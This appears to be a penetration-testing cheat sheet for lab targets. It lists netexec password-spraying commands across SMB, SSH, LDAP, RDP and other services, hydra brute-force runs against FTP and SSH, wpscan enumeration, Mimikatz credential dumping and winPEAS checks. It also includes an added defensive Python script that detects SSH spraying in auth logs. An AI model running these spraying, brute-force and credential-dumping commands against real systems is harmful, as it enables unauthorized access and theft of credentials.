Random useful stuff

NXC

If you have a list of users and passwords and want to spray against a service (check nmap to see what services are available).

nxc smb targets.txt -u users.txt -p passwords.txt
nxc ssh targets.txt -u users.txt -p passwords.txt
nxc ldap targets.txt -u users.txt -p passwords.txt
nxc ftp targets.txt -u users.txt -p passwords.txt
nxc wmi targets.txt -u users.txt -p passwords.txt
nxc winrm targets.txt -u users.txt -p passwords.txt
nxc rdp targets.txt -u users.txt -p passwords.txt
nxc vnc targets.txt -u users.txt -p passwords.txt
nxc mssql targets.txt -u users.txt -p passwords.txt
nxc nfs targets.txt -u users.txt -p passwords.txt

If you get errors such as this when spraying:

[06:55:00] ERROR    Internal Paramiko error for Admin:root, Error reading SSH protocol banner[Errno 104] Connection reset by peer                  ssh.py:234
SSH         192.168.113.153 22     192.168.113.153  [-] root:root
[06:55:04] ERROR    Internal Paramiko error for sarah:root, Error reading SSH protocol banner[Errno 104] Connection reset by peer                  ssh.py:234

You might miss valid credentials if it errors on the correct ones (I’ve tested this). In that case you can add jitter and decrease the threads; play around with the jitter value, as you might not need such a long wait between each attempt:

nxc ssh 192.168.113.153 -u users.txt -p pass.txt --jitter 10-20 -t 1
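From the defender's side, a spray like the one above shows up in sshd's auth log as a single source address failing against many distinct usernames in a short window, which looks nothing like one user mistyping a password. The following is an added example, not part of these notes, that parses constructed auth.log lines and flags that pattern; the threshold of four usernames per 60-second window is an assumption.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd auth.log sample (not a real capture): one source cycling
# through usernames is the spray pattern; one user failing twice is noise.
SAMPLE_LOG = """\
Jun 10 06:55:00 host sshd[1201]: Failed password for root from 192.168.113.10 port 51002 ssh2
Jun 10 06:55:01 host sshd[1203]: Failed password for invalid user sarah from 192.168.113.10 port 51004 ssh2
Jun 10 06:55:02 host sshd[1205]: Failed password for invalid user admin from 192.168.113.10 port 51006 ssh2
Jun 10 06:55:03 host sshd[1207]: Failed password for invalid user backup from 192.168.113.10 port 51008 ssh2
Jun 10 06:55:04 host sshd[1209]: Failed password for invalid user svc from 192.168.113.10 port 51010 ssh2
Jun 10 06:58:30 host sshd[1301]: Failed password for alice from 10.0.0.7 port 40001 ssh2
Jun 10 06:58:40 host sshd[1303]: Failed password for alice from 10.0.0.7 port 40002 ssh2
Jun 10 06:58:55 host sshd[1305]: Accepted password for alice from 10.0.0.7 port 40003 ssh2
"""

# Matches only failed password attempts; "invalid user" is optional because
# sshd only prints it for accounts that do not exist.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)

def parse_failures(text, year=2024):
    """Yield (timestamp, user, src) for each failed-password line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["user"], m["src"]

def detect_spray(text, min_users=4, window_s=60):
    """Return {src: sorted usernames} for every source that failed against
    at least min_users distinct accounts inside some window_s-second span."""
    by_src = defaultdict(list)
    for ts, user, src in parse_failures(text):
        by_src[src].append((ts, user))
    hits = {}
    for src, events in by_src.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            users = {u for t, u in events[i:] if (t - start).total_seconds() <= window_s}
            if len(users) >= min_users:
                hits[src] = sorted(users)
                break
    return hits
```

Point it at a real /var/log/auth.log (or `journalctl -u ssh` output) and lower the threshold to taste; the spray source is reported with the full set of accounts it tried, which is what you want for an alert.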

To connect as Administrator you need to pass the --local-auth flag. When spraying a user list against a password or hash, it's worth adding --local-auth if you're going to include Administrator as a user.

proxychains nxc smb 10.10.206.154 -u Administrator -p hghgib6vHT3bVWf --local-auth

Bruteforce FTP:

hydra -L users.txt -P /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt 192.168.79.46 ftp -V -f

Password Bruteforce SSH:

hydra -L users.txt -P pass.txt -e nsr -q ssh://192.168.120.85 -t 4 -w 5 -f

WordPress:

wpscan --url http://192.168.192.174 --enumerate p,t,u -v

Mimikatz:

privilege::debug
sekurlsa::logonpasswords

Winpeas:

Run all checks while avoiding time-consuming searches:

.\winPEASany.exe quiet cmd fast

Display currently running processes:

tasklist